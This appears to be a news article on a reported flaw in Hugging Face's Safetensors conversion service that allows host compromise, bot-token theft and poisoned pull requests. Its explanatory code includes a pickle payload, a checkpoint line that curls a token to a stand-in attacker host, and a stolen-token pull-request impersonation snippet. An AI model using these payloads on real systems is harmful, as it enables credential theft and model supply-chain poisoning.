
New Vulnerability in Hugging Face Platform Exposes AI Models to Supply Chain Attacks

Hackers could steal user-submitted models and mount supply chain attacks through a vulnerability in Hugging Face's Safetensors conversion service, according to security researchers.

According to HiddenLayer's research, attackers can exploit this vulnerability to send malicious pull requests to Hugging Face repositories via the conversion bot, hijack models submitted through the conversion service, and impersonate the bot to tamper with repositories.

Hugging Face is a popular platform for hosting and collaborating on pre-trained machine learning models and datasets. The company developed the Safetensors format to store tensors securely, as an alternative to pickle files, which threat actors can abuse to execute arbitrary code.
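To illustrate the class of risk pickle poses and Safetensors avoids, here is a minimal sketch; the `Malicious` class and the echoed string are illustrative, not taken from the research:

```python
import pickle
import os

# A pickle payload can run arbitrary code on load via __reduce__.
class Malicious:
    def __reduce__(self):
        # The callable and arguments returned here are invoked at
        # unpickling time, not when the object is serialized.
        return (os.system, ("echo pwned",))

payload = pickle.dumps(Malicious())
pickle.loads(payload)  # prints "pwned" -- deserialization executes code

# Safetensors, by contrast, stores raw tensor bytes plus a JSON header,
# so loading it cannot trigger code execution:
# from safetensors.torch import load_file
# tensors = load_file("model.safetensors")  # data-only, no unpickling
```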

The platform also offers a conversion service that users can invoke to convert their PyTorch models to Safetensors. Based on HiddenLayer's research, an attacker could compromise the host running the conversion service by submitting a malicious PyTorch binary.
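A minimal sketch of how such a binary might work, assuming the conversion host loads submitted checkpoints with an unpickling `torch.load()` call; the `EvilCheckpoint` class, file names, and payload command are hypothetical:

```python
import os
import torch

# PyTorch checkpoints are pickle archives, so loading one can run
# attacker-controlled code on whatever host deserializes it -- here,
# the conversion service.
class EvilCheckpoint:
    def __reduce__(self):
        # Hypothetical payload: exfiltrate the service's access token.
        return (os.system, ("curl -d @token https://attacker.example",))

# The attacker uploads this file and requests a conversion.
torch.save({"weights": EvilCheckpoint()}, "pytorch_model.bin")

# On the conversion host, a single load triggers the payload
# (in PyTorch versions where torch.load defaults to full unpickling):
# state_dict = torch.load("pytorch_model.bin")
```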

Using the token of SFConvertbot, Hugging Face's official conversion bot, attackers could implant neural backdoors, tamper with models, and submit malicious pull requests to repositories without users' awareness. Potential consequences include token theft, unauthorized access to data and models, and supply chain compromise.
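A sketch of what bot impersonation could look like via the `huggingface_hub` API; the token, repository name, file names, and commit message are placeholders, not details from the report:

```python
from huggingface_hub import HfApi, CommitOperationAdd

# Hypothetical: with the bot's stolen token, an attacker can open pull
# requests that look like routine conversion-bot activity.
api = HfApi(token="STOLEN_BOT_TOKEN")  # placeholder token

api.create_commit(
    repo_id="victim-org/popular-model",  # placeholder repository
    operations=[
        # Swap in a backdoored weights file disguised as a conversion.
        CommitOperationAdd(
            path_in_repo="model.safetensors",
            path_or_fileobj="backdoored_model.safetensors",
        )
    ],
    commit_message="Adding `safetensors` variant of this model",
    create_pr=True,  # appears as an innocuous bot-style conversion PR
)
```

Because maintainers are accustomed to merging such pull requests from the bot, a forged one is unlikely to draw scrutiny.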

Despite efforts to safeguard them, machine learning models in the Hugging Face ecosystem remain susceptible to attack, the researchers conclude. A single compromise of the conversion service could jeopardize every model it has ever converted.

The disclosure follows Trail of Bits' discovery of LeftoverLocals (CVE-2023-4969), a vulnerability that allows recovery of data from the local memory of GPUs made by Apple, Qualcomm, AMD, and Imagination. Caused by inadequate isolation of process memory, it poses particular risks to ML systems that keep sensitive data in GPU memory.
